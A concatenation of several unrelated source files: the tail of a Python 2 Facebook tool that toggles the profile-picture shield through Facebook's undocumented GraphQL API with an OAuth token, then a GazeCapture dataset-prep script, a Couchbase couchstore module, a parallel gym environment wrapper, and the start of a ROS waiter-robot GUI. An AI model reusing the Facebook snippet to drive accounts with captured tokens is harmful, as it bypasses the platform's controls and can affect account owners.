data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
prepareDataset.py | import math, shutil, os, time, argparse, json, re, sys
import numpy as np
import scipy.io as sio
from PIL import Image
import multiprocessing
from multiprocessing import Queue
from operator import itemgetter
import pprint as pp
'''
Prepares the GazeCapture dataset for use with the pytorch code. Crops images, compiles JSONs into metadata.mat
Author: Petr Kellnhofer ( pkel_lnho (at) gmai_l.com // remove underscores and spaces), 2018.
Website: http://gazecapture.csail.mit.edu/
Cite:
Eye Tracking for Everyone
K.Krafka*, A. Khosla*, P. Kellnhofer, H. Kannan, S. Bhandarkar, W. Matusik and A. Torralba
IEEE Conference on Computer Vision and Pattern Recognition (CVPR), 2016
@inproceedings{cvpr2016_gazecapture,
Author = {Kyle Krafka and Aditya Khosla and Petr Kellnhofer and Harini Kannan and Suchendra Bhandarkar and Wojciech Matusik and Antonio Torralba},
Title = {Eye Tracking for Everyone},
Year = {2016},
Booktitle = {IEEE Conference on Computer Vision and Pattern Recognition (CVPR)}
}
'''
parser = argparse.ArgumentParser(description='iTracker-pytorch-PrepareDataset.')
parser.add_argument('--dataset_path', help="Path to extracted files. It should have folders called '%%05d' in it.")
parser.add_argument('--output_path', default=None, help="Where to write the output. Can be the same as dataset_path if you wish (=default).")
parser.add_argument('--num_jobs', default=15, help="Number of separate processes to spawn to parallelize processing. Default=15")
args = parser.parse_args()
g_meta_queue = Queue()
g_meta_list = []
g_meta = {
'labelRecNum': [],
'frameIndex': [],
'labelDotXCam': [],
'labelDotYCam': [],
'labelFaceGrid': [],
}
def process_recording(recordings, thread_id):
"""Executes processing of a given recording."""
# Output structure
meta = {
'labelRecNum': [],
'frameIndex': [],
'labelDotXCam': [],
'labelDotYCam': [],
'labelFaceGrid': [],
}
for i,recording in enumerate(recordings):
print('[%d/%d] Thread %d Processing recording %s (%.2f%%)' % (i, len(recordings), thread_id, recording, i / len(recordings) * 100))
recDir = os.path.join(args.dataset_path, recording)
recDirOut = os.path.join(args.output_path, recording)
# Read JSONs
appleFace = readJson(os.path.join(recDir, 'appleFace.json'))
if appleFace is None:
continue
appleLeftEye = readJson(os.path.join(recDir, 'appleLeftEye.json'))
if appleLeftEye is None:
continue
appleRightEye = readJson(os.path.join(recDir, 'appleRightEye.json'))
if appleRightEye is None:
continue
dotInfo = readJson(os.path.join(recDir, 'dotInfo.json'))
if dotInfo is None:
continue
faceGrid = readJson(os.path.join(recDir, 'faceGrid.json'))
if faceGrid is None:
continue
frames = readJson(os.path.join(recDir, 'frames.json'))
if frames is None:
continue
# info = readJson(os.path.join(recDir, 'info.json'))
# if info is None:
# continue
# screen = readJson(os.path.join(recDir, 'screen.json'))
# if screen is None:
# continue
facePath = preparePath(os.path.join(recDirOut, 'appleFace'))
leftEyePath = preparePath(os.path.join(recDirOut, 'appleLeftEye'))
rightEyePath = preparePath(os.path.join(recDirOut, 'appleRightEye'))
# Preprocess
allValid = np.logical_and(np.logical_and(appleFace['IsValid'], appleLeftEye['IsValid']), np.logical_and(appleRightEye['IsValid'], faceGrid['IsValid']))
if not np.any(allValid):
continue
frames = np.array([int(re.match('(\d{5})\.jpg$', x).group(1)) for x in frames])
bboxFromJson = lambda data: np.stack((data['X'], data['Y'], data['W'],data['H']), axis=1).astype(int)
faceBbox = bboxFromJson(appleFace) + [-1,-1,1,1] # for compatibility with matlab code
leftEyeBbox = bboxFromJson(appleLeftEye) + [0,-1,0,0]
rightEyeBbox = bboxFromJson(appleRightEye) + [0,-1,0,0]
leftEyeBbox[:,:2] += faceBbox[:,:2] # relative to face
rightEyeBbox[:,:2] += faceBbox[:,:2]
faceGridBbox = bboxFromJson(faceGrid)
for j,frame in enumerate(frames):
# Can we use it?
if not allValid[j]:
continue
# Load image
imgFile = os.path.join(recDir, 'frames', '%05d.jpg' % frame)
if not os.path.isfile(imgFile):
logError('Warning: Could not read image file %s!' % imgFile)
continue
img = Image.open(imgFile)
if img is None:
logError('Warning: Could not read image file %s!' % imgFile)
continue
img = np.array(img.convert('RGB'))
# Crop images
imFace = cropImage(img, faceBbox[j,:])
imEyeL = cropImage(img, leftEyeBbox[j,:])
imEyeR = cropImage(img, rightEyeBbox[j,:])
# Save images
Image.fromarray(imFace).save(os.path.join(facePath, '%05d.jpg' % frame), quality=95)
Image.fromarray(imEyeL).save(os.path.join(leftEyePath, '%05d.jpg' % frame), quality=95)
Image.fromarray(imEyeR).save(os.path.join(rightEyePath, '%05d.jpg' % frame), quality=95)
# Collect metadata
meta['labelRecNum'] += [int(recording)]
meta['frameIndex'] += [frame]
meta['labelDotXCam'] += [dotInfo['XCam'][j]]
meta['labelDotYCam'] += [dotInfo['YCam'][j]]
meta['labelFaceGrid'] += [faceGridBbox[j,:]]
return meta
def run_process(thread_id, name, recordings):
"""Executes a spawned process.
This process will process a contiguous chunk of the sorted recordings and push the results to a thread safe queue.
"""
print("Starting " + name)
meta = process_recording(recordings, thread_id)
meta_tup = (thread_id, meta) # Tuple so we can sort later on
# Add to global thread-safe queue
g_meta_queue.put(meta_tup)
print("{} finished. Processed {} recordings".format(name, len(recordings)))
def split(a, n):
"""Splits a list into n chunks of approximately equal size"""
k, m = divmod(len(a), n)
return (a[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in range(n))
def main():
if args.output_path is None:
args.output_path = args.dataset_path
if args.dataset_path is None or not os.path.isdir(args.dataset_path):
raise RuntimeError('No such dataset folder %s!' % args.dataset_path)
if args.jobs <= 0:
args.jobs = 15
preparePath(args.output_path)
# list recordings
recordings = os.listdir(args.dataset_path)
recordings = np.array(recordings, np.object)
recordings = recordings[[os.path.isdir(os.path.join(args.dataset_path, r)) for r in recordings]]
recordings.sort()
# Split recordings into approximately equal sized chunks for each thread
chunked_recordings = list(split(recordings, args.jobs))
processes = []
pp.pprint(chunked_recordings)
num_processes = 0
for i,recording in enumerate(chunked_recordings):
# Start parallel processes
name = "Thread " + str(i)
p = multiprocessing.Process(target=run_process, args=(i, name, recording))
processes.append((i, p))
p.start()
num_processes += 1
meta_list = []
num_processes_remaining = int(num_processes)
while num_processes_remaining > 0:
while not g_meta_queue.empty():
meta_list.append(g_meta_queue.get())
num_processes_remaining -= 1
print("{} processes remaining".format(num_processes_remaining))
time.sleep(5)
for p_tup in processes:
p_id, p = p_tup
# Join processes
p.join()
print("Joined process {}".format(p_id))
# Sort meta_list in order of thread id (so lower thread num comes first)
meta_list.sort(key=itemgetter(0))
for item in meta_list:
thread_id, meta = item
for key in meta:
g_meta[key] += meta[key]
print("Created g_meta database")
# Integrate
g_meta['labelRecNum'] = np.stack(g_meta['labelRecNum'], axis = 0).astype(np.int16)
g_meta['frameIndex'] = np.stack(g_meta['frameIndex'], axis = 0).astype(np.int32)
g_meta['labelDotXCam'] = np.stack(g_meta['labelDotXCam'], axis = 0)
g_meta['labelDotYCam'] = np.stack(g_meta['labelDotYCam'], axis = 0)
g_meta['labelFaceGrid'] = np.stack(g_meta['labelFaceGrid'], axis = 0).astype(np.uint8)
# Load reference metadata
print('Will compare to the reference GitHub dataset metadata.mat...')
reference = sio.loadmat('./reference_metadata.mat', struct_as_record=False)
reference['labelRecNum'] = reference['labelRecNum'].flatten()
reference['frameIndex'] = reference['frameIndex'].flatten()
reference['labelDotXCam'] = reference['labelDotXCam'].flatten()
reference['labelDotYCam'] = reference['labelDotYCam'].flatten()
reference['labelTrain'] = reference['labelTrain'].flatten()
reference['labelVal'] = reference['labelVal'].flatten()
reference['labelTest'] = reference['labelTest'].flatten()
# Find mapping
mKey = np.array(['%05d_%05d' % (rec, frame) for rec, frame in zip(g_meta['labelRecNum'], g_meta['frameIndex'])], np.object)
rKey = np.array(['%05d_%05d' % (rec, frame) for rec, frame in zip(reference['labelRecNum'], reference['frameIndex'])], np.object)
mIndex = {k: i for i,k in enumerate(mKey)}
rIndex = {k: i for i,k in enumerate(rKey)}
mToR = np.zeros((len(mKey,)),int) - 1
for i,k in enumerate(mKey):
if k in rIndex:
mToR[i] = rIndex[k]
else:
logError('Did not find rec_frame %s from the new dataset in the reference dataset!' % k)
rToM = np.zeros((len(rKey,)),int) - 1
for i,k in enumerate(rKey):
if k in mIndex:
rToM[i] = mIndex[k]
else:
logError('Did not find rec_frame %s from the reference dataset in the new dataset!' % k, critical = False)
#break
# Copy split from reference
g_meta['labelTrain'] = np.zeros((len(g_meta['labelRecNum'],)),np.bool)
g_meta['labelVal'] = np.ones((len(g_meta['labelRecNum'],)),np.bool) # default choice
g_meta['labelTest'] = np.zeros((len(g_meta['labelRecNum'],)),np.bool)
validMappingMask = mToR >= 0
g_meta['labelTrain'][validMappingMask] = reference['labelTrain'][mToR[validMappingMask]]
g_meta['labelVal'][validMappingMask] = reference['labelVal'][mToR[validMappingMask]]
g_meta['labelTest'][validMappingMask] = reference['labelTest'][mToR[validMappingMask]]
# Write out metadata
metaFile = os.path.join(args.output_path, 'metadata.mat')
print('Writing out the metadata.mat to %s...' % metaFile)
sio.savemat(metaFile, g_meta)
# Statistics
nMissing = np.sum(rToM < 0)
nExtra = np.sum(mToR < 0)
totalMatch = len(mKey) == len(rKey) and np.all(np.equal(mKey, rKey))
print('======================\n\tSummary\n======================')
print('Total added %d frames from %d recordings.' % (len(g_meta['frameIndex']), len(np.unique(g_meta['labelRecNum']))))
if nMissing > 0:
print('There are %d frames missing in the new dataset. This may affect the results. Check the log to see which files are missing.' % nMissing)
else:
print('There are no missing files.')
if nExtra > 0:
print('There are %d extra frames in the new dataset. This is generally ok as they were marked for validation split only.' % nExtra)
else:
print('There are no extra files that were not in the reference dataset.')
if totalMatch:
print('The new metadata.mat is an exact match to the reference from GitHub (including ordering)')
#import pdb; pdb.set_trace()
input("Press Enter to continue...")
def readJson(filename):
if not os.path.isfile(filename):
logError('Warning: No such file %s!' % filename)
return None
with open(filename) as f:
try:
data = json.load(f)
except:
data = None
if data is None:
logError('Warning: Could not read file %s!' % filename)
return None
return data
def preparePath(path, clear = False):
if not os.path.isdir(path):
os.makedirs(path, 0o777)
if clear:
files = os.listdir(path)
for f in files:
fPath = os.path.join(path, f)
if os.path.isdir(fPath):
shutil.rmtree(fPath)
else:
os.remove(fPath)
return path
def logError(msg, critical = False):
print(msg)
if critical:
sys.exit(1)
def cropImage(img, bbox):
bbox = np.array(bbox, int)
aSrc = np.maximum(bbox[:2], 0)
bSrc = np.minimum(bbox[:2] + bbox[2:], (img.shape[1], img.shape[0]))
aDst = aSrc - bbox[:2]
bDst = aDst + (bSrc - aSrc)
res = np.zeros((bbox[3], bbox[2], img.shape[2]), img.dtype)
res[aDst[1]:bDst[1],aDst[0]:bDst[0],:] = img[aSrc[1]:bSrc[1],aSrc[0]:bSrc[0],:]
return res
if __name__ == "__main__":
main()
print('DONE')
|
pump_sfd.py | #!/usr/bin/env python3
import glob
import json
import logging
import os
import queue
import re
import struct
import threading
from collections import defaultdict
from typing import Any, Dict, List, Optional, Tuple
import couchstore # pylint: disable=import-error
import couchbaseConstants
import pump
from cb_bin_client import decode_collection_id, encode_collection_id
SFD_SCHEME = "couchstore-files://"
SFD_VBUCKETS = 1024
SFD_REV_META = ">QIIBB" # cas, exp, flg, flex_meta, dtype
SFD_REV_META_PRE_4_6 = ">QIIBBB" # cas, exp, flg, flex_meta, dtype, conf_res
SFD_REV_SEQ = ">Q"
SFD_DB_SEQ = ">Q"
SFD_RE = "^([0-9]+)\\.couch\\.([0-9]+)$"
# TODO: (1) SFDSource - total_msgs.
# TODO: (1) SFDSink - ensure right user for bucket_dir.
# TODO: (1) SFDSink - ensure right user for couchstore file.
class SFDSource(pump.Source):
"""Reads couchstore files from a couchbase server data directory."""
def __init__(self, opts, spec, source_bucket, source_node,
source_map, sink_map, ctl, cur):
super(SFDSource, self).__init__(opts, spec, source_bucket, source_node,
source_map, sink_map, ctl, cur)
self.done = False
self.queue = None
print('Starting sfd source: ', spec)
@staticmethod
def can_handle(opts, spec: str) -> bool:
return spec.startswith(SFD_SCHEME)
@staticmethod
def check_base(opts, spec: str) -> couchbaseConstants.PUMP_ERROR:
# Skip immediate superclass Source.check_base(),
# since SFDSource can handle different vbucket states.
return pump.EndPoint.check_base(opts, spec)
@staticmethod
def check(opts, spec: str) -> Tuple[couchbaseConstants.PUMP_ERROR, Optional[Dict[str, Any]]]:
rv, d = data_dir(spec)
if rv != 0:
return rv, None
buckets = []
for bucket_dir in sorted(glob.glob(f'{d}/*/')):
if not glob.glob(f'{bucket_dir}/*.couch.*'):
continue
bucket_name = os.path.basename(os.path.dirname(bucket_dir))
if not bucket_name:
return f'error: bucket_name too short: {bucket_dir}', None
rv, v = SFDSource.vbucket_states(opts, spec, bucket_dir)
if rv != 0:
return rv, None
buckets.append({'name': bucket_name,
'nodes': [{'hostname': 'N/A',
'vbucket_states': v}]})
if not buckets:
return f'error: no bucket subdirectories at: {d}', None
return 0, {'spec': spec, 'buckets': buckets}
@staticmethod
def vbucket_states(opts, spec, bucket_dir) -> Tuple[couchbaseConstants.PUMP_ERROR, Optional[Dict[str, Any]]]:
"""Reads all the latest couchstore files in a directory, and returns
map of state string (e.g., 'active') to map of vbucket_id to doc."""
vbucket_states: Dict[str, Any] = defaultdict(dict)
for f in latest_couch_files(bucket_dir):
vbucket_id = int(re.match(SFD_RE, os.path.basename(f)).group(1)) # type: ignore
try:
store = couchstore.CouchStore(f, 'r')
try:
doc_str = store.localDocs['_local/vbstate']
if doc_str:
doc = json.loads(doc_str)
state = doc.get('state', None)
if state:
vbucket_states[state][vbucket_id] = doc
else:
return f'error: missing vbucket_state from: {f}', None
except Exception as e:
return f'error: could not read _local/vbstate from: {f}; exception: {e}', None
store.close()
except Exception as e:
return f'error: could not read couchstore file: {f}; exception: {e}', None
if vbucket_states:
return 0, vbucket_states
return f'error: no vbucket_states in files: {bucket_dir}', None
@staticmethod
def provide_design(opts, source_spec: str, source_bucket, source_map) -> Tuple[couchbaseConstants.PUMP_ERROR,
Optional[str]]:
rv, d = data_dir(source_spec)
if rv != 0:
return rv, None
bucket_dir = f'{d}/{source_bucket["name"]}'
if not os.path.isdir(bucket_dir):
return 0, None
rv, store, _ = open_latest_store(bucket_dir, "master.couch.*", "^(master)\\.couch\\.([0-9]+)$",
"master.couch.0", mode='r')
if rv != 0 or not store:
return rv, None
rows = []
for doc_info in store.changesSince(0):
if not doc_info.deleted:
try:
doc_contents = doc_info.getContents(options=couchstore.CouchStore.DECOMPRESS)
except Exception as e:
return f'error: could not read design doc: {doc_info.id}; source_spec: {source_spec};' \
f' exception: {e}', None
try:
doc = json.loads(doc_contents)
except ValueError as e:
return f'error: could not parse design doc: {doc_info.id}; source_spec: {source_spec};' \
f' exception: {e}', None
doc['id'] = doc.get('id', doc_info.id)
doc['_rev'] = doc.get('_rev', doc_info.revSequence)
rows.append({'id': doc_info.id, 'doc': doc})
store.close()
return 0, json.dumps(rows)
def provide_batch(self) -> Tuple[couchbaseConstants.PUMP_ERROR, Optional[pump.Batch]]:
if self.done:
return 0, None
if not self.queue:
name = "c" + threading.currentThread().getName()[1:]
self.queue = queue.Queue(2)
self.thread = threading.Thread(target=self.loader, name=name)
self.thread.daemon = True
self.thread.start()
rv, batch = self.queue.get()
self.queue.task_done()
if rv != 0 or batch is None:
self.done = True
return rv, batch
def loader(self):
rv, d = data_dir(self.spec)
if rv != 0:
self.queue.put((rv, None))
return
source_vbucket_state = \
getattr(self.opts, 'source_vbucket_state', 'active')
source_nodes = self.source_bucket['nodes']
if len(source_nodes) != 1:
self.queue.put((f'error: expected 1 node in source_bucket: {self.source_bucket["name"]}', None))
return
vbucket_states = source_nodes[0].get('vbucket_states', None)
if not vbucket_states:
self.queue.put((f'error: missing vbucket_states in source_bucket: {self.source_bucket["name"]}', None))
return
vbuckets = vbucket_states.get(source_vbucket_state, None)
if vbuckets is None: # Empty dict is valid.
self.queue.put((f'error: missing vbuckets in source_bucket: {self.source_bucket["name"]}', None))
return
batch_max_size = self.opts.extra['batch_max_size']
batch_max_bytes = self.opts.extra['batch_max_bytes']
store = None
vbucket_id = None
# Level of indirection since we can't use python 3 nonlocal statement.
abatch: List[pump.Batch] = [pump.Batch(self)]
def change_callback(doc_info):
if doc_info:
# Handle the new key name spacing for collections and co
cid, key = decode_collection_id(doc_info.id.encode())
# Only support keys in the _default collection
if cid != 0:
logging.debug('Skipping as not default collection')
return
if self.skip(key, vbucket_id):
return
if doc_info.deleted:
cmd = couchbaseConstants.CMD_DCP_DELETE
else:
cmd = couchbaseConstants.CMD_DCP_MUTATION
# Deletes/Tombstone can contains a body
val = doc_info.getContents(options=couchstore.CouchStore.DECOMPRESS)
try:
rev_meta_bytes = doc_info.revMeta.get_bytes()
if len(rev_meta_bytes) == 18:
conf_res = 0
cas, exp, flg, flex_meta, dtype = struct.unpack(SFD_REV_META, rev_meta_bytes)
elif len(rev_meta_bytes) == 19:
cas, exp, flg, flex_meta, dtype, conf_res = struct.unpack(SFD_REV_META_PRE_4_6, rev_meta_bytes)
else:
raise ValueError('Does not match pre- or post-4.6 format')
meta = int(doc_info.revSequence).to_bytes(8, 'big')
seqno = doc_info.sequence
nmeta = 0
msg = (cmd, vbucket_id, key, flg, exp, cas, meta, val, seqno, dtype, nmeta, conf_res)
abatch[0].append(msg, len(val))
except Exception as e:
self.queue.put((f'error: could not read couchstore file due to unsupported file format version;'
f' exception: {e}', None))
return
if (abatch[0].size() >= batch_max_size or
abatch[0].bytes >= batch_max_bytes):
self.queue.put((0, abatch[0]))
abatch[0] = pump.Batch(self)
for f in latest_couch_files(f'{d}/{self.source_bucket["name"]}'):
vbucket_id = int(re.match(SFD_RE, os.path.basename(f)).group(1))
if vbucket_id not in vbuckets:
continue
try:
store = couchstore.CouchStore(f, 'r')
store.forEachChange(0, change_callback)
store.close()
except Exception:
# MB-12270: Some files may be deleted due to compaction. We can
# safely ignore them and move to next file.
pass
if abatch[0].size():
self.queue.put((0, abatch[0]))
self.queue.put((0, None))
class SFDSink(pump.Sink):
"""Sink for couchstore in couchbase server/file/directory layout."""
def __init__(self, opts, spec, source_bucket, source_node,
source_map, sink_map, ctl, cur):
super(SFDSink, self).__init__(opts, spec, source_bucket, source_node,
source_map, sink_map, ctl, cur)
self.rehash = opts.extra.get("rehash", 0)
self.init_worker(SFDSink.run)
@staticmethod
def run(self):
destination_vbucket_state = getattr(self.opts, 'destination_vbucket_state', 'active')
vbucket_states = self.source_node.get('vbucket_states', {})
while not self.ctl['stop']:
batch, future = self.pull_next_batch() # type: pump.Batch, pump.SinkBatchFuture
if not batch:
return self.future_done(future, 0)
vbuckets = batch.group_by_vbucket_id(SFD_VBUCKETS, self.rehash)
for vbucket_id, msgs in vbuckets.items():
checkpoint_id = 0
max_deleted_seqno = 0
rv, store, store_path = self.open_store(vbucket_id)
if rv != 0:
return self.future_done(future, rv)
bulk_keys = []
bulk_vals = []
for i, msg in enumerate(msgs):
cmd, _vbucket_id, key, flg, exp, cas, meta, val, seqno, dtype, nmeta, conf_res = msg
if self.skip(key, vbucket_id):
continue
# TODO: add default collection to all keys in CC this should change to have the correct collection
key = encode_collection_id(0) + key
d = couchstore.DocumentInfo(key.decode())
flex_meta = 1
d.revMeta = struct.pack(SFD_REV_META, cas, exp, flg, flex_meta, dtype)
if len(meta) != 0:
if len(meta) > 8:
meta = meta[0:8]
if len(meta) < 8:
meta = (b'\x00\x00\x00\x00\x00\x00\x00\x00' + meta)[-8:]
d.revSequence, = struct.unpack(SFD_REV_SEQ, meta)
else:
d.revSequence = 1
if seqno:
d.sequence = int(seqno)
if cmd in [couchbaseConstants.CMD_TAP_MUTATION, couchbaseConstants.CMD_DCP_MUTATION]:
try:
v = val
if dtype & 0x01:
d.contentType = couchstore.DocumentInfo.IS_JSON
# Why do this when we have a flag for it?
# if re.match('^\\s*{', v) and json.loads(v) is not None:
# d.contentType = couchstore.DocumentInfo.IS_JSON
except ValueError:
pass # NON_JSON is already the default contentType.
elif cmd in [couchbaseConstants.CMD_TAP_DELETE, couchbaseConstants.CMD_DCP_DELETE]:
v = None
else:
self.future_done(future, f'error: SFDSink bad cmd: {cmd!s}')
store.close()
return
bulk_keys.append(d)
bulk_vals.append(v)
try:
if bulk_keys and bulk_vals:
vm = vbucket_states.get(destination_vbucket_state, None)
if vm:
vi = vm.get(vbucket_id, None)
if vi:
c = int(vi.get("checkpoint_id", checkpoint_id))
checkpoint_id = max(checkpoint_id, c)
m = int(vi.get("max_deleted_seqno", max_deleted_seqno))
max_deleted_seqno = max(max_deleted_seqno, m)
rv = self.save_vbucket_state(store, vbucket_id,
destination_vbucket_state,
checkpoint_id,
max_deleted_seqno)
if rv != 0:
self.future_done(future, rv)
store.close()
return
store.saveMultiple(bulk_keys, bulk_vals,
options=couchstore.CouchStore.COMPRESS)
store.commit()
store.close()
except Exception as e:
self.future_done(future, f'error: could not save couchstore data; vbucket_id: {vbucket_id}; '
f'store_path: {store_path}; exception: {e}')
return
self.future_done(future, 0) # No return to keep looping.
def save_vbucket_state(self, store, vbucket_id,
state, checkpoint_id, max_deleted_seqno):
doc = json.dumps({'state': state,
'checkpoint_id': str(checkpoint_id),
'max_deleted_seqno': str(max_deleted_seqno)})
try:
store.localDocs['_local/vbstate'] = doc
except Exception as e:
return f'error: save_vbucket_state() failed: {e!s}'
return 0
@staticmethod
def can_handle(opts, spec: str) -> bool:
return spec.startswith(SFD_SCHEME)
@staticmethod
def check_base(opts, spec: str) -> couchbaseConstants.PUMP_ERROR:
if getattr(opts, "destination_operation", None) is not None:
return f'error: --destination-operation is not supported by this destination: {spec}'
# Skip immediate superclass Sink.check_base(),
# since SFDSink can handle different vbucket states.
return pump.EndPoint.check_base(opts, spec)
@staticmethod
def check(opts, spec: str, source_map) -> Tuple[couchbaseConstants.PUMP_ERROR, None]:
# TODO: (2) SFDSink - check disk space.
rv, dir = data_dir(spec)
if rv != 0:
return rv, None
if not os.path.isdir(dir):
return f'error: not a directory: {dir}', None
if not os.access(dir, os.W_OK):
return f'error: directory is not writable: {dir}', None
return 0, None
@staticmethod
def consume_design(opts, sink_spec, sink_map,
source_bucket, source_map, source_design) -> couchbaseConstants.PUMP_ERROR:
if not source_design:
return 0
try:
sd = json.loads(source_design)
except ValueError:
return f'error: could not parse source_design: {source_design}'
rv, d = data_dir(sink_spec)
if rv != 0:
return rv
bucket_dir = f'{d}/{source_bucket["name"]}'
if not os.path.isdir(bucket_dir):
os.mkdir(bucket_dir)
rv, store, _ = open_latest_store(bucket_dir, "master.couch.*", "^(master)\\.couch\\.([0-9]+)$",
"master.couch.1")
if rv != 0:
return rv
bulk_keys = []
bulk_vals = []
if sd:
for row in sd['rows']:
logging.debug("design_doc row: " + str(row))
doc_info = couchstore.DocumentInfo(str(row['id']))
if '_rev' in row['doc']:
doc_info.revMeta = str(row['doc']['_rev'])
del row['doc']['_rev']
doc_info.contentType = couchstore.DocumentInfo.IS_JSON
bulk_keys.append(doc_info)
bulk_vals.append(json.dumps(row['doc']))
if bulk_keys and bulk_vals:
store.saveMultiple(bulk_keys, bulk_vals) # type: ignore # TODO: Compress ddocs?
store.commit() # type: ignore
store.close() # type: ignore
return 0
def consume_batch_async(self, batch: Optional[pump.Batch]) -> Tuple[couchbaseConstants.PUMP_ERROR,
Optional[pump.SinkBatchFuture]]:
return self.push_next_batch(batch, pump.SinkBatchFuture(self, batch))
def open_store(self, vbucket_id: int):
# data_dir => /opt/couchbase/var/lib/couchbase/data/
# bucket_dir => default/
# store_path => VBUCKET_ID.couch.COMPACTION_NUM
if vbucket_id >= SFD_VBUCKETS:
return f'error: vbucket_id too large: {vbucket_id}', None, None
rv, bucket_dir = self.find_bucket_dir()
if rv != 0:
return rv, None, None
return open_latest_store(bucket_dir, f'{vbucket_id}.couch.*', SFD_RE, f'{vbucket_id!s}.couch.1', mode='c')
def find_bucket_dir(self) -> Tuple[couchbaseConstants.PUMP_ERROR, str]:
rv, d = data_dir(self.spec)
if rv != 0:
return rv, ''
bucket_dir = d + '/' + self.source_bucket['name']
if not os.path.isdir(bucket_dir):
try:
os.mkdir(bucket_dir)
except OSError as e:
return f'error: could not create bucket_dir: {bucket_dir}; exception: {e}', ''
return 0, bucket_dir
def open_latest_store(bucket_dir: str, glob_pattern: str, filter_re: str, default_name: str, mode: str = 'c') \
-> Tuple[couchbaseConstants.PUMP_ERROR, Optional[couchstore.CouchStore], str]:
store_paths = latest_couch_files(bucket_dir,
glob_pattern=glob_pattern,
filter_re=filter_re)
if not store_paths:
if mode == 'r':
return 0, None, ''
store_paths = [f'{bucket_dir}/{default_name}']
if len(store_paths) != 1:
return f'error: no single, latest couchstore file: {glob_pattern}; found: {store_paths}', None, ''
try:
return 0, couchstore.CouchStore(str(store_paths[0]), mode), store_paths[0]
except Exception as e:
return f'error: could not open couchstore file: {store_paths[0]}; exception: {e}', None, ''
def latest_couch_files(bucket_dir: str, glob_pattern: str = '*.couch.*', filter_re: str = SFD_RE) -> List[str]:
"""Given directory of *.couch.VER files, returns files with largest VER suffixes."""
files = glob.glob(f'{bucket_dir}/{glob_pattern}')
files = [f for f in files if re.match(filter_re, os.path.basename(f))]
matches = [(re.match(filter_re, os.path.basename(f)), f) for f in files]
latest: Dict[str, Tuple[int, str]] = {}
for match, file in matches:
top, _ = latest.get(match.group(1), (-1, None)) # type: ignore
cur = int(match.group(2)) # type: ignore
if cur > top:
latest[match.group(1)] = (cur, file) # type: ignore
return sorted([file for top, file in latest.values()])
def data_dir(spec: str) -> Tuple[couchbaseConstants.PUMP_ERROR, str]:
if not spec.startswith(SFD_SCHEME):
return f'error: wrong scheme in spec: {spec}', ''
dir = spec[len(SFD_SCHEME):]
if dir:
return 0, os.path.normpath(dir)
return f'error: missing dir in spec: {spec}', ''
|
penv.py | from multiprocessing import Process, Pipe
import gym
def worker(conn, env): # this function works on remote; it uses remote.recv() to receives commands to execute.
while True: # local sends these commands. remote is the remote worker thread.
cmd, data = conn.recv()
if cmd == "step":
obs, reward, done, info = env.step(data)
if done:
obs = env.reset()
conn.send((obs, reward, done, info))
elif cmd == "reset":
obs = env.reset()
conn.send(obs)
else:
raise NotImplementedError
class ParallelEnv(gym.Env):
"""A concurrent execution of environments in multiple processes."""
def __init__(self, envs):
assert len(envs) >= 1, "No environment given."
self.envs = envs
self.observation_space = self.envs[0].observation_space
self.action_space = self.envs[0].action_space
self.locals = []
for env in self.envs[1:]: # why start from 1 instead of 0
local, remote = Pipe()
self.locals.append(local)
p = Process(target=worker, args=(remote, env))
p.daemon = True
p.start()
remote.close()
def reset(self):
for local in self.locals:
local.send(("reset", None))
results = [self.envs[0].reset()] + [local.recv() for local in self.locals]
return results
def step(self, actions):
for local, action in zip(self.locals, actions[1:]):
local.send(("step", action))
obs, reward, done, info = self.envs[0].step(actions[0])
if done: # why are we doing first one manually
obs = self.envs[0].reset()
results = zip(*[(obs, reward, done, info)] + [local.recv() for local in self.locals])
return results
def render(self):
raise NotImplementedError |
control_panel.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'control.ui'
#
# Created by: PyQt5 UI code generator 5.10.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
import rospy
from geometry_msgs.msg import Twist
from std_msgs.msg import Float64
import time
from threading import *
import sys
import os
import cv2
from subprocess import *
import actionlib
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from geometry_msgs.msg import Point
from sensor_msgs.msg import Image
from cv_bridge import CvBridge
move_cmd = Twist()
t1 = ["t1", 1.47, 5.98]
t2 = ["t2", -2.28, 6.02]
t3 = ["t3", -4.86, 6.15]
t4 = ["t4", 1.68, 9.27]
t5 = ["t5", -2.31, 9.46]
t6 = ["t6", -4.76, 9.46]
t7 = ["t7", 1.68, 13.03]
t8 = ["t8", -2.08, 13.10]
t9 = ["t9", -4.86, 13.16]
charge = [-4.80, -0.75]
kitchen = [0.10, -0.36]
table_cor = [t1, t2, t3, t4, t5, t6, t7, t8, t9]
table_num = [[]]
battery = 100
class Ui_waiter_bot(object):
def __init__(self):
super(Ui_waiter_bot, self).__init__()
self.stop_flag = False
self.map_flag = True
def movebase_client(self, x_corr, y_corr):
client = actionlib.SimpleActionClient('move_base',MoveBaseAction)
client.wait_for_server()
xGoal = x_corr
yGoal = y_corr
goal = MoveBaseGoal()
goal.target_pose.header.frame_id = "map"
goal.target_pose.header.stamp = rospy.Time.now()
goal.target_pose.pose.position = Point(xGoal,yGoal,0)
goal.target_pose.pose.orientation.x = 0.0
